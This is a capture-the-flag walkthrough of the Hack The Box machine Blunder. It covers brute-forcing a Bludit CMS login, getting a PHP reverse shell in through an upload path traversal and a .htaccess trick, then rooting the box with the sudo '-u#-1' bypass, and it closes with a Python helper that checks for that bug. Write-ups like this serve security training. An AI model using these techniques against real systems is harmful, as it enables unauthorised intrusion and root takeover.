Hack The Box — Blunder — without Metasploit (TJNull’s list for OSCP)
This is my 22nd write-up for Blunder, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.
A typical penetration test or CTF box goes through three major phases:
- Enumeration and Scanning (Information Gathering).
- Initial Foothold.
- Privilege Escalation.
Let’s get started with the box!
Enumeration
To get into a system we first need to gather information about it. We use Nmap to scan the target's ports and find out which services are running, because those services are what we will be attacking. To save time, we first find out which ports are open at all, and then run a detailed scan only against those ports.
nmap -p- blunder.htb --max-retries=2
Only one port (80) appears to be open, so let's run a targeted Nmap scan against it.
nmap -sC -sV -T4 -A -p80 blunder.htb
The target is running Apache 2.4.41 on Ubuntu.
Let’s navigate to the web-server and see what we have there.
It is just a normal-looking page with nothing interesting on it, so let's run gobuster to discover directories and files.
gobuster dir -u http://blunder.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x php,cgi,sh,db,jsp,html,log,txt -t 200 -k --no-error
Gobuster finds a few directories and some interesting files. Going through them, we find an admin login panel at /admin.
We also check /todo.txt.
It hints that the username could be fergus, and the note also mentions images, which will matter later.
At this point we know a likely username and we know the site is running Bludit CMS.
Initial Foothold
A quick Google search for a Bludit exploit gave me the following exploit for Bludit 3.9.2:
https://github.com/0xkasra/CVE-2019-16113
If we check the source of the CMS login page, version 3.9.2 is mentioned repeatedly, so this exploit should match our target. Let's look at it.
The exploit brute-forces the login and then tries to get RCE on the CMS. Let's run it.
I tried running it against the username fergus with rockyou.txt as the password list, but it was taking forever. So instead I generated a wordlist from the web server's home page, which has a lot of text, using cewl.
cewl http://blunder.htb > cewl.txt
Then I ran the brute force again with this newly created wordlist.
The exploit found the credentials but failed to get a reverse shell. Let's check manually at /admin whether the credentials are valid.
The credentials are valid!
Under New content in the left panel there is an image upload feature, and todo.txt had already hinted at images.
Let's try to upload a PHP reverse shell.
It says we can only upload gif, png, jpg, jpeg and svg files, so let's change the extension of our shell from php to gif. Renaming only gets the file past the extension check; Apache will still serve a .gif as an image rather than execute it, which is what the .htaccess step further down addresses.
Let’s try the upload again.
And it gets uploaded.
Searching for more exploits, I found the following Metasploit module:
https://www.exploit-db.com/exploits/47699
Looking at its code, it first uploads the PHP shell with the destination directory (the uuid parameter) set to ../../tmp, a path traversal out of the per-page upload directory, and then writes a .htaccess file into the same directory so that Apache treats .png files there as PHP.
We can do the same manually: upload the gif through the admin panel and use Burp Suite to change the destination to ../../tmp instead of bl-content/uploads/pages/<32-character-randomhex>/.
Let’s upload our file to bl-content/tmp
Scrolling down in the intercepted request, we see that the uuid field contains the same random 32-character destination directory. We change it to ../../tmp.
The upload progress bar turns green, indicating that the file has been uploaded.
Next, let's create a file named htaccess.gif containing the .htaccess content from the Metasploit module, adjusted so that it makes .gif files execute as PHP.
We upload it the same way into bl-content/tmp: intercept the upload request, set uuid to ../../tmp, and change the file name in the request from htaccess.gif to .htaccess.
This time the panel says that only image files can be uploaded. However, the file has been written to disk anyway.
We can now start a listener and browse to /bl-content/tmp/phpshell.gif to trigger the reverse shell.
And we got a reverse shell!
Privilege Escalation
First, let's upgrade to a proper PTY shell with Python.
python -c 'import pty;pty.spawn("/bin/bash")'
Let's see which users exist on the target.
cat /etc/passwd
We can see two regular users, hugo and shaun.
Inside /var/www there are two versions of Bludit: the 3.9.2 install we exploited and another one, 3.10.0a, that we have not touched yet. Let's look at it.
Inside bludit-3.10.0a/bl-content/databases there is a file named users.php.
Viewing that file shows Hugo's password hash. Let's try CrackStation on it.
CrackStation returns Password120. Let's switch to hugo with that password.
su hugo
We are now hugo. Let's see what hugo is allowed to run with sudo.
sudo -l
The rule lets hugo run the command as any user (ALL) except root, which is explicitly excluded with !root.
Now let's check the sudo version.
sudo -V
The installed sudo is 1.8.25p1. There is a well-known vulnerability in sudo versions before 1.8.28 (CVE-2019-14287) that affects exactly this kind of "ALL but not root" rule. Googling the version quickly turns up the following exploit write-up:
https://www.exploit-db.com/exploits/47502
Reading it, we learn that passing the user ID -1 (or its unsigned form 4294967295) with -u#-1 slips past the !root restriction while sudo still ends up executing the command as root.
sudo -u#-1 /bin/bash
And we are root! :)
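A small triage helper for this last step, added here as an example and not part of the write-up: it takes the text of `sudo -V` and the relevant `sudo -l` line and reports whether both preconditions of CVE-2019-14287 hold (sudo older than 1.8.28, and a runas spec that allows ALL but excludes root), then prints the command to run. The sample strings in the test are constructed to match what this box shows; on a real target they come from running the two commands.

```python
"""Check sudo -V / sudo -l output for the CVE-2019-14287 preconditions.

Added example, not from the write-up. Version strings and sudoers lines are
the inputs; nothing is executed.
"""
import re

FIXED_IN = (1, 8, 28)  # CVE-2019-14287 was fixed in sudo 1.8.28


def parse_sudo_version(banner):
    """Turn 'Sudo version 1.8.25p1' into (1, 8, 25).

    The 'pN' patch level is ignored: the fix arrived in a new minor release,
    so only the three numeric components matter for the comparison.
    """
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", banner)
    if m is None:
        raise ValueError("no version number in: %r" % banner)
    return tuple(int(x) for x in m.groups())


def version_vulnerable(banner):
    return parse_sudo_version(banner) < FIXED_IN


def runas_exploitable(sudo_l_line):
    """True for a runas spec such as (ALL, !root).

    The bug: -u#-1 is accepted as uid -1, which the !root check does not
    recognise as root, while setresuid(-1) leaves the effective uid (already 0
    inside sudo) unchanged, so the command runs as root anyway.
    """
    m = re.search(r"\(([^)]*)\)", sudo_l_line)
    if m is None:
        return False
    # Only the user part of "(users:groups)" matters here.
    users = [u.strip() for u in m.group(1).split(":")[0].split(",")]
    return "ALL" in users and ("!root" in users or "!#0" in users)


def assess(banner, sudo_l_line):
    """Return the sudo command to try, or None if the preconditions fail."""
    if not (version_vulnerable(banner) and runas_exploitable(sudo_l_line)):
        return None
    command = re.sub(r"^.*\)\s*", "", sudo_l_line).strip()
    return "sudo -u#-1 " + command


if __name__ == "__main__":
    # Constructed sample input matching this box; replace with real output.
    print(assess("Sudo version 1.8.25p1", "    (ALL, !root) /bin/bash"))
```

If the version check passes but the runas spec is a plain (root) or (ALL) rule, the helper returns None: the trick only matters where root is excluded by name, since an (ALL) rule already allows -u root directly.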